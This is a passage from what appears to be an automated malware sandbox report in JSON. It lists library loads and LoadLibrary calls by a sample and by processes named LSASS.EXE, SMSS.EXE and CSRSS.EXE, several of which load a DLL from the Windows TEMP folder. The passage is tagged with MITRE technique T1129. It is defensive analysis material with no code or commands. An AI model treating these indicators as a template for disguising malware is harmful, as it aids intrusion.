\"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75910000\n \"D3_08.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abd0000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 711b0000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 711b0000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"LSASS.EXE\" loaded module \"KERNEL32\" at base 77cc0000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"LSASS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abd0000\n \"LSASS.EXE\" loaded module \"SXS.DLL\" at base 75970000\n \"LSASS.EXE\" loaded module \"CRYPTSP.DLL\" at base 75470000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75200000\n \"LSASS.EXE\" loaded module \"ADVAPI32.DLL\" at base 77720000\n \"LSASS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75960000\n \"LSASS.EXE\" loaded module \"KERNEL32.DLL\" at base 77cc0000\n \"LSASS.EXE\" loaded module \"SHELL32.DLL\" at base 76460000\n \"LSASS.EXE\" loaded module \"OLE32.DLL\" at base 77260000\n \"LSASS.EXE\" loaded module \"COMCTL32.DLL\" at base 74930000\n \"LSASS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76220000\n \"LSASS.EXE\" loaded module \"CLBCATQ.DLL\" at base 77180000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 745a0000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77cc0000\n \"LSASS.EXE\" loaded module \"SETUPAPI.DLL\" at base 762c0000\n \"LSASS.EXE\" loaded module \"RPCRT4.DLL\" at base 76110000\n \"LSASS.EXE\" loaded module \"NTMARTA.DLL\" at base 74ed0000\n \"LSASS.EXE\" loaded module \"USER32\" at base 75eb0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75910000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 748e0000\n \"LSASS.EXE\" loaded module \"DWMAPI.DLL\" at base 748a0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 748e0000\n \"WINLOGON.EXE\" loaded module \"SXS.DLL\" at base 75970000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 711b0000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SMSS.EXE\" loaded module \"KERNEL32\" at base 77cc0000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SMSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abd0000\n \"SMSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75960000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 748e0000\n \"SMSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76220000\n \"SMSS.EXE\" loaded module \"SXS.DLL\" at base 75970000\n \"SMSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 75470000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75200000\n \"SMSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 77720000\n \"SMSS.EXE\" loaded module \"DWMAPI.DLL\" at base 748a0000\n \"SMSS.EXE\" loaded module \"KERNEL32.DLL\" at base 77cc0000\n \"SMSS.EXE\" loaded module \"SHELL32.DLL\" at base 76460000\n \"SMSS.EXE\" loaded module \"OLE32.DLL\" at base 77260000\n \"SMSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74930000\n \"SMSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 77180000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 745a0000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77cc0000\n \"SMSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 762c0000\n \"SMSS.EXE\" loaded module \"RPCRT4.DLL\" at base 76110000\n \"SMSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74ed0000\n \"SMSS.EXE\" loaded module \"USER32\" at base 75eb0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75910000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abd0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abd0000\n \"SERVICES.EXE\" loaded module \"SXS.DLL\" at base 75970000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005080)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005160)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005160)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005160)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005160)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005160)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005160)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005160)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005160)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005160)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005160)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005160)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005160)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005160)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005160)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005160)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005160)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005160)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004880)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004596)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004596)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004596)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004596)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004596)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004596)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004596)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005356)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005356)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005356)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005356)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005356)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005356)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005356)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005356)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005356)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005356)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005356)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005072)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005072)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005072)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005072)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005072)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005072)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005072)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005072)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005072)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005072)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005072)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005072)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005072)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005072)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005072)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005072)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005152)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005152)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005452)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005452)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005452)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005452)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005452)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005452)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005452)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005452)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005452)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005452)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005364)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005364)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005364)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005364)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005364)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005364)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003360)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003360)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003360)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003360)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003360)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003360)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003360)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003360)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003360)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003360)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003360)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003360)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003360)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005752)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005752)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005752)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005752)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005752)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005752)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005752)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005544)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005544)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005544)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005544)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005544)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005544)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005544)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005544)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005728)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005728)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005728)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005728)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005728)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005728)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005728)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005728)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005756)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005716)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005716)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005780)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005780)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005780)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005780)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005780)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005780)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005780)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005780)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005780)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005780)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005780)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005780)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005780)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005780)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005780)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005780)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005780)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005560)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005560)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005560)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005560)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005560)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005560)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005560)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005560)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005560)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005560)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005560)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005524)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005524)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005524)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005524)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005524)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005524)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005524)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005524)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005524)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005608)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005608)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005608)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005608)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005608)\n \"CSRSS.EXE\" 